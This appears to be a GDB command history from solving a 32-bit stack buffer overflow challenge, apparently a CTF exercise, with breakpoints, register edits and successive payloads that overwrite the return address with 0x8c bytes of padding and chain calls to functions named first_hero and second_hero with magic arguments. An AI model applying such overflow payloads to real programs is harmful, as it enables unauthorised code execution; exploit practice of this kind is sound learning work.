114 lines
1.5 KiB
Plaintext
114 lines
1.5 KiB
Plaintext
|
start
|
||
|
si
|
||
|
ni
|
||
|
ni
|
||
|
r < <(python -c 'print "A"*0x8c + "\xeb\x84\x04\x08"')
|
||
|
pdisass reader
|
||
|
b *0x08048718
|
||
|
r < <(python -c 'print "A"*0x8c + "\xeb\x84\x04\x08"')
|
||
|
ni
|
||
|
si
|
||
|
c
|
||
|
r < <(python -c 'print "A"*0x8c + "\x53\x86\x04\x08"')
|
||
|
ni
|
||
|
si
|
||
|
ni
|
||
|
r
|
||
|
ni
|
||
|
si
|
||
|
ni
|
||
|
set $eax=1
|
||
|
ni
|
||
|
x $ebp+0x8
|
||
|
set ($ebp+0x8)=0xdeadbeef
|
||
|
x $ebp+0x8
|
||
|
context
|
||
|
r
|
||
|
ni
|
||
|
si
|
||
|
ni
|
||
|
ni
|
||
|
set $eax=1
|
||
|
ni
|
||
|
b*0x804866b
|
||
|
r
|
||
|
c
|
||
|
set $eax=1
|
||
|
ni
|
||
|
x $ebp+0x8
|
||
|
set {int}0xffffcb04=0xdeadbeef
|
||
|
x $ebp+0x8
|
||
|
ni
|
||
|
ni
|
||
|
p $ebp+0xc
|
||
|
set {int}$8 = 0x88776655
|
||
|
ni
|
||
|
c
|
||
|
x 0x804b160
|
||
|
x/s 0x804b160
|
||
|
r < <(python -c 'print "A"*0x8c + "\x19\x86\x04\x08"')
|
||
|
ni
|
||
|
si
|
||
|
ni
|
||
|
ni
|
||
|
ni
|
||
|
set {int}0xffffcb00=0x08048653
|
||
|
context
|
||
|
si
|
||
|
ni
|
||
|
p $ebp+0x8
|
||
|
set {int}$11=0xdeadbeef
|
||
|
x $ebp+0x8
|
||
|
p $ebp+0xc
|
||
|
set {int}$12=88776655
|
||
|
ni
|
||
|
b first_hero
|
||
|
b second_hero
|
||
|
r
|
||
|
c
|
||
|
ni
|
||
|
set {int}0xffffcb00=0x08048653
|
||
|
ni
|
||
|
c
|
||
|
c
|
||
|
r
|
||
|
c
|
||
|
ni
|
||
|
set {int}0xffffcb00=0x08048653
|
||
|
si
|
||
|
ni
|
||
|
set {int}$11=0xdeadbeef
|
||
|
x $ebp+0x8
|
||
|
x $ebp+0xc
|
||
|
set {int}$12=0x88776655
|
||
|
x $ebp+0xc
|
||
|
ni
|
||
|
c
|
||
|
b*0x080486fe
|
||
|
r < <(python -c 'print "A"*0x8c')
|
||
|
ni
|
||
|
r < <(python -c 'print "A"*0x8c + "\x19\x86\x04\x08"')
|
||
|
ni
|
||
|
si
|
||
|
ni
|
||
|
r
|
||
|
ni
|
||
|
ni
|
||
|
ni
|
||
|
ni
|
||
|
ni
|
||
|
r
|
||
|
ni
|
||
|
r < <(python -c 'print "A"*0x8c + "\x19\x86\x04\x08" + "\x53\x86\x04\x08"')
|
||
|
ni
|
||
|
ni
|
||
|
r
|
||
|
ni
|
||
|
r < <(python -c 'from pwn import *;print "A"*0x8c + "\x19\x86\x04\x08" + "\x53\x86\x04\x08" + p32(0xdeadbeef) + p32(0x88776655)')
|
||
|
ni
|
||
|
ni
|
||
|
r < <(python -c 'from pwn import *;print "A"*0x8c + "\x19\x86\x04\x08" + "\x53\x86\x04\x08" + "AAAA" + p32(0xdeadbeef) + p32(0x88776655)')
|
||
|
ni
|
||
|
c
|
||
|
r < <(python -c 'from pwn import *;print "A"*0x8c + "\x19\x86\x04\x08" + "\x53\x86\x04\x08" + "AAAA" + p32(0xdeadbeef) + p32(0x88776655)')
|